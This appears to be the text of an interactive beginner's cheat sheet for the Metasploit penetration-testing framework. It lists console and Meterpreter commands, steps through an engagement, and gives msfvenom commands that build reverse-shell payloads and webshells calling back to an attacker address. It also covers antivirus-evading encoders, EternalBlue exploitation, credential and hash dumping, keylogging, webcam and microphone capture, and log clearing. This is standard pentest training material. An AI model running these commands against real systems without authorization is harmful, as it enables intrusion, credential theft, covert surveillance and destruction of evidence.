Your complete beginner's reference for the world's most widely used penetration testing framework.
The Metasploit Framework (MSF) is an open-source penetration testing platform created by H.D. Moore in 2003 and acquired by Rapid7 in 2009. It's the industry standard tool for developing, testing, and executing exploits against remote targets.
Metasploit provides a unified interface to thousands of exploits, payloads, scanners, and post-exploitation tools. Whether you're a beginner or an experienced red teamer, Metasploit dramatically speeds up the penetration testing process.
Code that takes advantage of a specific vulnerability in software or hardware to gain access.
Code delivered and executed on the target after a successful exploit β e.g., a shell or Meterpreter session.
Modules for scanning, fuzzing, sniffing, and information gathering β no payload needed.
Post-exploitation modules run after access is gained β for privilege escalation, persistence, and data exfiltration.
Transform payloads to evade antivirus and IDS detection.
An advanced, in-memory payload providing a powerful interactive shell with built-in capabilities.
Every Metasploit engagement follows this fundamental pattern:
The -q flag skips the ASCII art banner and launches faster.
Step-by-step from first launch to post-exploitation
Every msfconsole command in one place
Generate complete exploit command sequences
End-to-end pentest methodology
Post-exploitation powerhouse reference
Build a complete Metasploit command sequence β configure your exploit, payload, and options visually.
Tip: Copy the entire sequence and paste it into msfconsole β it executes line by line automatically.
Every msfconsole command, option, and module type.
| Command | Description |
|---|---|
| help / ? | Show all available commands |
| help <command> | Get help on a specific command |
| version | Display Metasploit version |
| banner | Display a random Metasploit banner |
| connect <host> <port> | Connect to a host (like netcat) |
| exit / quit | Exit msfconsole |
| history | Show command history |
| makerc <file> | Save command history to a resource file |
| resource <file.rc> | Execute commands from a resource script file |
| spool <file> | Log all console output to a file |
| reload_all | Reload all modules from disk |
| load <plugin> | Load a Metasploit plugin (e.g., load kiwi) |
| unload <plugin> | Unload a loaded plugin |
| Command | Description |
|---|---|
| search <term> | Search all modules by name, CVE, platform, type, etc. |
| search type:exploit platform:windows | Filter search by type and platform |
| search cve:2017-0144 | Search by CVE number |
| use <module path> | Select a module to use |
| use <number> | Select module by search result number |
| info | Show full module info: description, options, references |
| info <module path> | Show info for a module without selecting it |
| show options | Show configurable options for current module |
| show advanced | Show advanced module options |
| show payloads | Show compatible payloads for current exploit |
| show targets | Show exploit targets (OS versions, service versions) |
| show exploits | List all exploit modules |
| show auxiliary | List all auxiliary modules |
| show post | List all post-exploitation modules |
| show encoders | List all encoder modules |
| back | Exit current module, return to main prompt |
| previous | Go back to previously selected module |
| check | Check if target is vulnerable (not all modules support this) |
| run / exploit | Execute the current module |
| run -j | Run module as a background job |
| run -z | Run and immediately background new sessions |
| Command | Description |
|---|---|
| set <OPTION> <value> | Set an option for the current module |
| set RHOSTS 192.168.1.100 | Set the target host(s) |
| set RHOSTS 192.168.1.0/24 | Set target as a subnet |
| set LHOST 192.168.1.10 | Set your attacker IP (for reverse payloads) |
| set LPORT 4444 | Set your listener port |
| set PAYLOAD windows/meterpreter/reverse_tcp | Select a payload |
| set TARGET 0 | Select an exploit target by index |
| set VERBOSE true | Enable verbose output |
| setg <OPTION> <value> | Set option globally (persists across modules) |
| setg LHOST 192.168.1.10 | Set LHOST globally once for entire session |
| unset <OPTION> | Unset a specific option |
| unset all | Unset all options for current module |
| unsetg <OPTION> | Unset a global option |
| get <OPTION> | Show the current value of an option |
| save | Save current settings to configuration file |
| Command | Description |
|---|---|
| sessions | List all active sessions |
| sessions -l | List sessions (verbose) |
| sessions -i <id> | Interact with / attach to a session |
| sessions -k <id> | Kill (terminate) a session |
| sessions -K | Kill all active sessions |
| sessions -u <id> | Upgrade shell session to Meterpreter |
| sessions -c <cmd> | Run a command on all sessions |
| Ctrl+Z | Background current session, return to msfconsole |
| background | Background current Meterpreter session |
| Command | Description |
|---|---|
| db_status | Check if database is connected |
| workspace | List all workspaces |
| workspace -a <name> | Create a new workspace |
| workspace -d <name> | Delete a workspace |
| workspace <name> | Switch to a workspace |
| db_nmap <options> <target> | Run nmap and store results in the database |
| db_nmap -sV -O 192.168.1.0/24 | Example: version and OS scan stored to DB |
| hosts | List all discovered hosts in current workspace |
| hosts -R | Set RHOSTS to all hosts in the database |
| services | List all discovered services |
| services -p 80,443 | Filter services by port number |
| vulns | List all detected vulnerabilities |
| creds | List all captured credentials |
| notes | List notes from the database |
| db_export -f xml out.xml | Export database to XML file |
| db_import <file> | Import scan results (Nmap XML, Nessus, etc.) |
| Command | Description |
|---|---|
| jobs | List all running background jobs |
| jobs -l | List jobs (verbose) |
| kill <job_id> | Kill a specific background job by ID |
| jobs -K | Kill all running jobs |
| route | View and manage routes for pivoting |
| route add <subnet> <session> | Route traffic through a session (pivoting) |
| route flush | Remove all routes |
| Task | Commands |
|---|---|
| EternalBlue (MS17-010) exploit | use exploit/windows/smb/ms17_010_eternalblue |
| SMB vulnerability check (scanner) | use auxiliary/scanner/smb/smb_ms17_010 |
| Port scan via Metasploit | use auxiliary/scanner/portscan/tcp |
| SSH brute force | use auxiliary/scanner/ssh/ssh_login |
| Catch reverse shell | use exploit/multi/handler |
| Local privilege escalation suggester | use post/multi/recon/local_exploit_suggester |
| Hash dumping (Windows) | use post/windows/gather/hashdump |
| List smb shares | use auxiliary/scanner/smb/smb_enumshares |
| HTTP directory scan | use auxiliary/scanner/http/dir_scanner |
| SNMP enumeration | use auxiliary/scanner/snmp/snmp_enum |
Step-by-step walkthroughs for beginners β from launching msfconsole to post-exploitation.
Metasploit uses PostgreSQL to store scan results, credentials, and session data.
This creates the database schema. Only needed once. Verify with db_status inside msfconsole.
You'll see the msf6 > prompt. The -q flag skips the banner for faster startup.
Should show: postgresql connected to msf
Workspaces keep different engagements separate in the database.
Or use the number shown in search results: use 0
Your prompt changes to: msf6 exploit(windows/smb/ms17_010_eternalblue) >
Shows: description, author, CVE references, available targets, required options, and notes on reliability.
Look for options marked Required: yes β these must be set before running.
All nmap flags work with db_nmap. Results go straight into the Metasploit database.
This automatically populates RHOSTS with all hosts in the database β great for scanning multiple targets at once.
Check all Required options are set. Double-check LHOST is your actual IP address.
On success you'll see: Meterpreter session 1 opened and your prompt becomes meterpreter >
This module catches incoming connections from payloads β it doesn't attack anything, it listens.
The payload here MUST match the payload embedded in your malicious file/link.
0.0.0.0 listens on all interfaces β use your specific IP if needed.
Running as a job lets you continue using msfconsole while waiting for connections.
Tries multiple techniques to escalate to SYSTEM. Run getuid afterwards to verify.
Dumps local account hashes in format: user:RID:LM_hash:NTLM_hash. Requires SYSTEM.
Migrate your Meterpreter into a stable process like explorer.exe or svchost.exe to avoid losing your session.
Populates RHOSTS with every host in the database β powerful for running a scanner across all discovered targets.
Definitions for every Metasploit concept, term, and option.
The complete Metasploit methodology for a penetration test β from setup to reporting.
Define the scope, start your database, and create a workspace for the engagement.
Discover hosts, open ports, and services. Store results directly in the Metasploit database.
Run targeted auxiliary scanners to find exploitable vulnerabilities.
Select an exploit, configure options, and gain access. Start with the most impactful, least noisy attack.
Once inside, gather intelligence, escalate privileges, and pivot to other systems.
Use a compromised host as a stepping stone into internal, unreachable networks.
Export your findings, clean up artifacts, and prepare your report.
Complete command reference for Metasploit's advanced post-exploitation shell.
Ctrl+Z or type background to return to msfconsole without killing the session.| Command | Description |
|---|---|
| sysinfo | OS, hostname, architecture, Meterpreter type |
| getuid | Current user context (e.g., NT AUTHORITY\SYSTEM) |
| getpid | Current process ID |
| ps | List all running processes |
| migrate <pid> | Migrate Meterpreter into another process |
| shell | Drop into an interactive system shell (cmd.exe / bash) |
| execute -f cmd.exe -i | Execute a program interactively |
| kill <pid> | Kill a process by ID |
| idletime | Seconds since user last interacted with the system |
| env | Show environment variables |
| clearev | Clear Windows event logs (Application, System, Security) |
| Command | Description |
|---|---|
| pwd | Print current remote directory |
| ls / dir | List files in current directory |
| cd <path> | Change remote directory |
| cat <file> | Display file contents |
| edit <file> | Open file in editor |
| upload <local> <remote> | Upload file to target |
| download <remote> <local> | Download file from target |
| rm <file> | Delete a file |
| mkdir <dir> | Create directory |
| search -f *.txt -d C:\\ | Search for files by pattern recursively |
| search -f password* -d C:\\Users | Search for password files |
| timestomp <file> -m "01/01/2020 00:00:00" | Modify file timestamps (anti-forensics) |
| Command | Description |
|---|---|
| ipconfig / ifconfig | Show network interfaces |
| arp | Display ARP cache (other hosts on LAN) |
| netstat | Show active connections |
| route | Show routing table |
| portfwd add -l 3389 -r 10.10.10.5 -p 3389 | Forward attacker port to internal target port |
| portfwd list | List active port forwards |
| portfwd flush | Remove all port forwards |
| Command | Description |
|---|---|
| getsystem | Attempt multiple auto-privilege escalation techniques |
| getsystem -t 1 | Technique 1: Named Pipe Impersonation (in memory) β 2: Named Pipe (dropper) β 3: Token Duplication |
| getuid | Verify current privilege level after escalation |
| use post/multi/recon/local_exploit_suggester | Find applicable local privilege escalation exploits |
| use post/windows/escalate/getsystem | Post module for getsystem |
| load incognito | Load incognito plugin for token impersonation |
| list_tokens -u | List available user tokens (incognito) |
| impersonate_token "NT AUTHORITY\\SYSTEM" | Impersonate a token (incognito) |
| Command | Description |
|---|---|
| hashdump | Dump local SAM hashes (requires SYSTEM) |
| run post/windows/gather/hashdump | Alternative hash dump via post module |
| load kiwi | Load Kiwi (Mimikatz) extension |
| creds_all | Dump all credentials using Kiwi |
| lsa_dump_sam | Dump SAM database with Kiwi |
| lsa_dump_secrets | Dump LSA secrets with Kiwi |
| wifi_list | List saved Wi-Fi networks and passwords |
| run post/windows/gather/credentials/credential_collector | Collect various stored credentials |
| Command | Description |
|---|---|
| screenshot | Take a screenshot of the target's desktop |
| screenshare | Watch the target's desktop in real-time |
| keyscan_start | Start keylogger |
| keyscan_dump | Dump captured keystrokes |
| keyscan_stop | Stop keylogger |
| webcam_list | List available webcams |
| webcam_snap | Take a photo from the webcam |
| webcam_stream | Stream webcam to browser |
| record_mic | Record audio from microphone |
| Command / Usage | Description |
|---|---|
| background | Background session, return to msfconsole |
| route add 10.10.10.0/24 1 | Route traffic through session 1 to internal subnet |
| route print | Show current routing table |
| portfwd add -l 3389 -r 10.10.10.5 -p 3389 | Forward RDP from internal host to attacker |
| use auxiliary/server/socks_proxy | Set up SOCKS5 proxy through compromised host |
Generate standalone payloads for delivery via email, web, USB, or social engineering.
| Platform | Command |
|---|---|
| Windows EXE | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe |
| Windows EXE (x64) | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell64.exe |
| Linux ELF | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf |
| Linux ELF (x64) | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell64.elf |
| macOS (x64 Intel) | msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f macho -o shell.macho |
| Android APK | msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -o shell.apk |
| PHP webshell | msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw -o shell.php |
| Python script | msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw -o shell.py |
| PowerShell | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f psh -o shell.ps1 |
| ASP webshell | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f asp -o shell.asp |
| WAR (Java server) | msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f war -o shell.war |
| Command | Description |
|---|---|
| msfvenom -l encoders | List all available encoders |
| msfvenom -l payloads | List all payloads |
| msfvenom -l formats | List all output formats |
| -e x86/shikata_ga_nai -i 5 | Encode with shikata_ga_nai, 5 iterations |
| -e x64/xor_dynamic -i 3 | XOR encoder for 64-bit payloads |
| --platform windows --arch x86 | Specify platform and architecture explicitly |
| -b "\x00\x0a\x0d" | Avoid bad characters in shellcode |
| -n 200 | Prepend N NOP sled bytes |
Always set up a listener before delivering a payload. Generated payloads connect back to your LHOST:LPORT.
Study Metasploit commands, terms, and payloads. Click a card to reveal the answer.
Correct / Incorrect keeps the card in the deck until you get it right Β· Mark Learned removes it permanently Β· Skip moves to the next card
Your saved commands β stored locally in your browser.
Personal notes β auto-saved to your browser's local storage.